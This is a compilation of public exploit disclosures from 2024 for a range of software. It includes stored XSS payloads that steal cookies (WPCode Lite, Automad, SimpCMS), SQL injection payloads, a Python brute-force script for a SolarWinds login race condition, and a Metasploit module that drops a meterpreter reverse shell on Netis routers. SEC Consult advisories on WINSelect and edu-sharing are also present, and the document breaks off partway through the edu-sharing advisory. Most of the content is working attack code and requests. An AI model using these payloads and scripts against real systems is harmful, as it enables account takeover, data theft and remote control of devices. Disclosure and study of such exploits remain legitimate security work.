<pre><code># Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS<br /># Date: 2024-06-30<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin<br /># Version 2.1.14<br /><br /><br />### Steps to Execute the Payload:<br /><br />1. **Access the Admin Panel:**<br /> - Navigate to the admin panel of your WordPress site.<br /> - Go to `Code Snippets > `Edit Snippet` via the following URL: <br /> ```<br /> https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10<br /> ```<br /><br />2. **Insert the Payload:**<br /> - In the **Code Preview** section, insert the following payload:<br /> ```<br /> "><img src=x onerrora=confirm() onerror=confirm(document.cookie)><br /> ```<br /><br />3. **Save and Verify:**<br /> - Active , Save the changes.<br /> - Navigate to the main page of your site:<br /> ```<br /> https://127.0.0.1/<br /> ```<br /> - You should see the payload executed.<br /><br />Post Request :<br /><br />POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2<br />Host: 127.0.0.1<br />Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3Dhtml<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 673<br />Origin: https://vagabondcreature.s3-tastewp.com<br />Dnt: 1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />wpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: xhibiter nft marketplace SQLI<br /># Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"<br /># Date: 29/06/204<br /># Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/<br /># Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA<br /># Version: 1.10.2<br /># Tested on: linux <br /># CVE : [if applicable]<br /><br />on this dir <br />https://localhost/collections?id=2<br />xhibiter nft marketplace suffers from SQLI <br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 36 columns<br /> Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br /></code></pre>
<pre><code># Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list"<br /># Date: 28/11/2023<br /># Exploit Author: Geraldo Alcantara<br /># Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code<br /># Version: 1.0<br /># Tested on: Windows<br /># CVE : CVE-2023-49976<br />*Steps to reproduce:*<br />1- Log in to the application.<br />2- Visit the ticket creation/editing page.<br />3- Create/Edit a ticket and insert the malicious payload into the<br />"subject" field/parameter.<br />Payload: <dt/><b/><script>alert(document.domain)</script><br /></code></pre>
<pre><code># Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)<br /># Date: 26-06-2024<br /># CVE: CVE-2024-39248<br /># Exploit Author: Jason Jacobs (0xjason_jacobs)<br /># Vendor Homepage: https://sourceforge.net/projects/simpcms/<br /># Software Link: https://sourceforge.net/projects/simpcms/<br /><br /># Category: Web Application<br /># Version: 0.1<br /># Vulnerable endpoint: /SimpCMS/admin.php<br /><br />Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:<br /><br />curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"<br /><br />Explanation:<br />- curl: The command-line tool for transferring data with URLs.<br />- -X POST: Specifies the request method to use (POST).<br />- "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.<br />- -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit": The POST request payload.<br /><br />Run this command in your terminal to send the POST request with the XSS payload.<br />Visit the /SimpCMS main site and the XSS will be visible.<br /></code></pre>
<pre><code># Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition<br /># CVE: CVE-2024-28999<br /># Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions<br /># Author: Elhussain Fathy, AKA 0xSphinx<br /><br />import requests<br />import urllib3<br />import asyncio<br />import aiohttp<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br />http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')<br /><br /># host = '192.168.1.1'<br /># username = "admin"<br /># file_path = "passwords.txt"<br /><br />host = input("Enter the host: ")<br />username = input("Enter the username: ")<br />file_path = input("Enter the passwords file path: ")<br />exploited = 0<br /><br />url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"<br /><br />passwords = []<br />with open(file_path, 'r') as file:<br /> for line in file:<br /> word = line.strip()<br /> passwords.append(word)<br />print(f"Number of tested passwords: {len(passwords)}")<br /><br /><br />headers = {<br /> 'Host': host,<br />}<br /><br />sessions = []<br /><br />for _ in range(len(passwords)):<br /> response = requests.get(url, headers=headers, verify=False, stream=False)<br /> cookies = response.headers.get('Set-Cookie', '')<br /> session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0]<br /> sessions.append(session_id)<br /><br /><br /><br /><br />async def send_request(session, username, password):<br /> headers = {<br /> 'Host': host, <br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE',<br /> }<br /><br /> data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}'<br /><br /> async with aiohttp.ClientSession() as session:<br /> async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:<br /> if response.status == 302:<br /> global exploited<br /> exploited = 1<br /> print(f"Exploited Successfully Username: {username}, Password: {password}")<br /><br /><br />async def main():<br /> tasks = []<br /> for i in range(len(passwords)):<br /> session = sessions[i]<br /> password = passwords[i]<br /> task = asyncio.create_task(send_request(session, username, password))<br /> tasks.append(task)<br /> await asyncio.gather(*tasks)<br /><br />asyncio.run(main())<br /><br />if(not exploited):<br /> print("Exploitation Failed")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)<br /># Date: 20-06-2024<br /># Exploit Author: Jerry Thomas (w3bn00b3r)<br /># Vendor Homepage: https://automad.org<br /># Software Link: https://github.com/marcantondahmen/automad<br /># Category: Web Application [Flat File CMS]<br /># Version: 2.0.0-alpha.4<br /># Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11<br />(bullseye)<br /><br /># Description<br /><br />A persistent (stored) cross-site scripting (XSS) vulnerability has been<br />identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker<br />to inject malicious JavaScript code into the template body. The injected<br />code is stored within the flat file CMS and is executed in the browser of<br />any user visiting the forum. This can result in session hijacking, data<br />theft, and other malicious activities.<br /><br /># Proof-of-Concept<br /><br />*Step-1:* Login as Admin & Navigate to the endpoint<br />http://localhost/dashboard/home<br /><br />*Step-2:* There will be a default Welcome page. You will find an option to<br />edit it.<br /><br />*Step-3:* Navigate to Content tab or<br />http://localhost/dashboard/page?url=%2F&section=text & edit the block named<br />***`Main`***<br /><br />*Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)><br /><br /><br />*Request:*<br /><br />POST /_api/page/data HTTP/1.1<br /><br />Host: localhost<br />Content-Length: 1822<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv<br />Accept: */*<br />Origin: http://localhost<br />Referer: http://localhost/dashboard/page?url=%2F&section=text<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie:<br />Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb<br />Connection: close<br /><br />------WebKitFormBoundaryzHmXQBdtZsTYQYCv<br />Content-Disposition: form-data; name="__csrf__"<br /><br />49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1<br />------WebKitFormBoundaryzHmXQBdtZsTYQYCv<br />Content-Disposition: form-data; name="__json__"<br /><br />{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing<br />for<br />xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS<br />identified by<br />Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You<br />have successfully installed Automad 2.<br><br><img src=x<br />onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit<br />Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}<br />------WebKitFormBoundaryzHmXQBdtZsTYQYCv--<br /><br /><br />*Response:*<br /><br />HTTP/1.1 200 OK<br /><br />Server: nginx/1.24.0<br />Date: Thu, 20 Jun 2024 19:17:35 GMT<br />Content-Type: application/json; charset=utf-8<br />Connection: close<br />X-Powered-By: PHP/8.3.6<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 30`<br /><br />{"code":200,"time":1718911055}<br /><br /><br />*Step-5:* XSS triggers when you go to homepage - http://localhost/<br /><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240624-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities allowing complete bypass<br /> product: Faronics WINSelect (Standard + Enterprise)<br /> vulnerable version: <8.30.xx.903<br /> fixed version: 8.30.xx.903<br /> CVE number: CVE-2024-36495, CVE-2024-36496, CVE-2024-36497<br /> impact: high<br /> homepage: https://www.faronics.com/products/winselect<br /> found: 2024-02-01<br /> by: Daniel Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"WINSelect - Allows you to easily control your end-users' Windows Experience without<br />having to deal with GPOs.<br />Need to Prevent Data From Leaving?<br />Whether you're working on classified government files or the secret ingredient<br />for your famous lasagna, you need to protect your sensitive information from<br />walking out the door.<br /><br />Faronics WINSelect offers the ability to disable USB ports and disk drives. Now<br />you can relax knowing your secrets won't be exported without your knowledge."<br /><br />Source: https://www.faronics.com/products/winselect<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)<br />The application saves its configuration in an encrypted file which "Everyone" has<br />read and write access to.<br /><br /><br />2) Hardcoded Credentials (CVE-2024-36496)<br />The configuration file is encrypted with a static key derived from a static five-<br />character password which allows an attacker to decrypt this file.<br /><br /><br />3) Unhashed Storage of Password (CVE-2024-36497)<br />The decrypted configuration file contains the password in cleartext which is used<br />to configure WINSelect. It can be used to remove the existing restrictions and<br />disable WINSelect entirely.<br /><br />By combining these issues any local attacker can disable WINSelect.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)<br /><br />WINSelect Standard saves its configuration in the following file:<br />C:\ProgramData\WINSelect\WINSelect.wsd<br /><br /><br />Every user has read and write permissions on this file by default:<br /><read_write_everyone.png><br /><br />The write permission is no problem as long as WINSelect is running, because it<br />is locked by the process WSEngine.exe.<br /><br />For WINSelect Enterprise the path for the configuration file is:<br />C:\ProgramData\Faronics\StorageSpace\WS\WINSelect.wsd<br /><br /><br />2) Hardcoded Credentials (CVE-2024-36496)<br />By analyzing the application via the API Monitor tool, we found that the<br />application uses a hardcoded five letter password, hashes it with the outdated<br />and broken MD5 algorithm (no salt) and uses the first five bytes as the key<br />for RC4. The configuration file is then encrypted with these parameters.<br /><br />After starting WINSelect.exe the MD5 and RC4 algorithms are requested:<br /><rc4_md5.png><br /><br />When the login to the configuration of WINSelect is triggered via<br />CTRL+ALT+SHIFT+F8, the configuration file is decrypted.<br /><login.png><br /><br />The hardcoded password "Kunal" is hashed.<br /><hash_input.png><br /><hash_output.png><br /><br />The first five bytes of the hash are used to instantiate a key object.<br /><key.png><br /><br />The configuration is then decrypted with this key.<br /><decrypted.jpeg><br /><br />To simplify this proof of concept the following python script was developed<br />which automatically decrypts an encrypted WINSelect.wsd:<br /><test.py><br /><br /><br />3) Unhashed Storage of Password (CVE-2024-36497)<br />By decrypting the configuration file, the used password can be extracted at the<br />beginning of the file:<br /><br />---<br /><?xml version="1.0"?><br /><KIOSK><br /> <SECTIONS><br /> <SECTION><br /> <SID>194</SID><!--S_ID_ADMIN_PASS--><br /> <RULES><br /> <RULE><br /> <ID>121</ID><!--R_ID_PROTECTION_ON_OFF--><br /> <ENABLED>1</ENABLED><br /> </RULE><br /> <RULE><br /> <ID>148</ID><!--R_ID_PROTECTION_ON_OFF_ADMIN--><br /> <ENABLED>1</ENABLED><br /> </RULE><br /> <RULE><br /> <ID>116</ID><!--R_ID_ADMIN_PASS--><br /> <ENABLED>1</ENABLED><br /> <DATA><br /> <PASSWORDSET>0</PASSWORDSET><br /> <ADMINPASSWORD>myadminpw</ADMINPASSWORD><br /> </DATA><br />---<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* 8.22.1112.886<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-02-19: Contacting vendor through support@faronics.com and<br /> customerservice@faronics.com<br />2024-02-20: Vendor responds with an email address to which we shall send the<br /> advisory.<br />2024-02-20: Asking for encryption, vendor requests unencrypted communication,<br /> submitting advisory.<br />2024-02-21: Vendor confirms receipt, engaged with product and development teams.<br />2024-02-27: Vendor introduces additional contact, will coordinate further responses.<br />2024-03-13: Additional contact apologizes for delayed response, vulnerabilities<br /> already discussed internally. Asks for extension of release.<br />2024-03-14: Extending advisory release to coordinate with patch.<br />2024-04-10: Vendor has addressed the reported issues in a test build for the<br /> standard version, enterprise fixes will be incorporated soon.<br />2024-04-18: Giving feedback that the issue is still exploitable, proposing a<br /> better hash function and random UUID, linking to OWASP password storage<br /> cheat sheet.<br />2024-04-21: Vendor thanks us for the proposed fix, current patch must be released, but<br /> working on new version incorporating our feedback.<br />2024-04-23: Providing further feedback, especially regarding GPU attacks.<br />2024-05-27: Asking for a status update.<br />2024-05-29: Vendor's last email got stuck in their mailbox. The latest WINSelect patch<br /> was released in early May, now incorporates PBKDF2. Provides release notes<br /> and download URL.<br /> Reserving CVE numbers.<br />2024-06-10: We can confirm that the PBKDF2 is used with SHA256 and 600000 iterations<br />2024-06-11: Since the hardcoded password for the encryption is not fixed, we ask if<br /> this will be addressed as well.<br /> Vendor responds that this will be addressed in a future release.<br />2024-06-24: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version 8.30.xx.903 since May 2024 which can be downloaded<br />from the following URL:<br />https://www.faronics.com/document-library/document/download-winselect-standard<br /><br />The vendor provided the following changelog:<br />https://www.faronics.com/en-uk/document-library/document/winselect-standard-release-notes<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Hirschberger / @2024<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Netis router MW5360 unauthenticated RCE.',<br /> 'Description' => %q{<br /> Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.<br /> The vulnerability stems from improper handling of the "password" parameter within the router's web interface.<br /> The router's login page authorization can be bypassed by simply deleting the authorization header,<br /> leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.<br /> Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection<br /> vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker<br /> to take control of the router.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'Adhikara13' # Discovery of the vulnerability<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-22729'],<br /> ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],<br /> ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']<br /> ],<br /> 'DisclosureDate' => '2024-01-11',<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_MIPSLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_MIPSLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => false,<br /> 'RPORT' => 80<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),<br /> OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])<br /> ])<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # cleanup payload file when session is established.<br /> if cmd.include?('chmod +x')<br /> register_files_for_cleanup(cmd.split('+x')[1].strip)<br /> end<br /> # skip last command to remove payload because it does not work<br /> unless cmd.include?('rm -f')<br /> payload = Base64.strict_encode64("`#{cmd}`")<br /> print_status("Executing #{cmd}")<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),<br /> 'vars_post' => {<br /> 'password' => payload,<br /> 'quick_set' => 'ap',<br /> 'app' => 'wan_set_shortcut'<br /> }<br /> })<br /> end<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),<br /> 'vars_post' => {<br /> 'mode_name' => 'skk_get',<br /> 'wl_link' => 0<br /> }<br /> })<br /> return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')<br /><br /> # trying to get the model and version number<br /> # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(<br /> version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)<br /> # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison<br /> unless version.nil?<br /> version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop<br /> # The model number part is usually something like Netis(NC63), but occassionally you see things like Stonet-N3D<br /> if version[2].upcase.split('-V')[0].include?('-')<br /> model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')<br /> else<br /> model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')<br /> end<br /> # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower<br /> if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))<br /> return CheckCode::Appears(version[2].chop.to_s)<br /> end<br /><br /> return CheckCode::Safe(version[2].chop.to_s)<br /> end<br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed<br /> execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240620-0 ><br />=======================================================================<br /> title: Arbitrary File Upload<br /> product: edu-sharing (metaVentis GmbH)<br />vulnerable versions: <8.0.8-RC2, <8.1.4-RC0, <9.0.0-RC19<br /> fixed versions: >=8.0.8-RC2, >=8.1.4-RC0, >=9.0.0-RC19<br /> CVE number: CVE-2024-28147<br /> impact: high<br /> homepage: https://edu-sharing.com<br /> found: 2024-04-04<br /> by: Kai Zimmermann (Office Frankfurt)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"edu-sharing software enables you to network your learning platforms and other<br />educational software. Share learning content, metadata and tools - make them<br />available in an educational cloud and let your users use them in all connected<br />systems."<br /><br />Source: https://edu-sharing.com<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Arbitrary File Upload (CVE-2024-28147)<br />An authenticated user can upload arbitrary files in the upload function for<br />collection preview images. An attacker may upload an HTML file that includes<br />malicious JavaScript code which will be executed if a user visits the direct<br />URL of the collection preview image (Stored Cross Site Scripting). It is also<br />possible to upload SVG files that include nested XML entities. Those are parsed<br />when a user visits the direct URL of the collection preview image, which may be<br />utilized for a Denial of Service attack.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Arbitrary File Upload (CVE-2024-28147)<br />An authenticated user can update the preview image of an existing collection<br />by sending the following request:<br /><br />--------------------------------------------------------------------------------<br />POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fpng HTTP/1.1<br />Host: $SERVER<br />Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID<br />Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885<br />Content-Length: 288<br /><br />-----------------------------159605426213527963452762824885<br />Content-Disposition: form-data; name="file";<br /><br />‰PNG<br /><br />[...]<br />-----------------------------159605426213527963452762824885--<br />--------------------------------------------------------------------------------<br /><br />The URL parameter "mimetype" can be modified to match any uploaded file. The<br />value is directly used in the server's "Content-Type" header.<br />Both, the Content-Type request header and the filename parameter in the<br />Content-Disposition request header do not need to be included in the data<br />boundary inside the request in order to be sent successfully and can therefore<br />be removed.<br />The preview image can then be accessed by visiting the following URL:<br />https://$SERVER/edu-sharing/preview?nodeId=$COLLECTIONID<br /><br /><br />a. Stored Cross Site Scripting (HTML Upload)<br />The initial request can be modified to include an HTML file, while keeping<br />the magic bytes of a PNG image file. The "mimetype" parameter is changed to<br />"text/html":<br /><br />--------------------------------------------------------------------------------<br />POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=text/html HTTP/1.1<br />Host: $SERVER<br />Cookie: 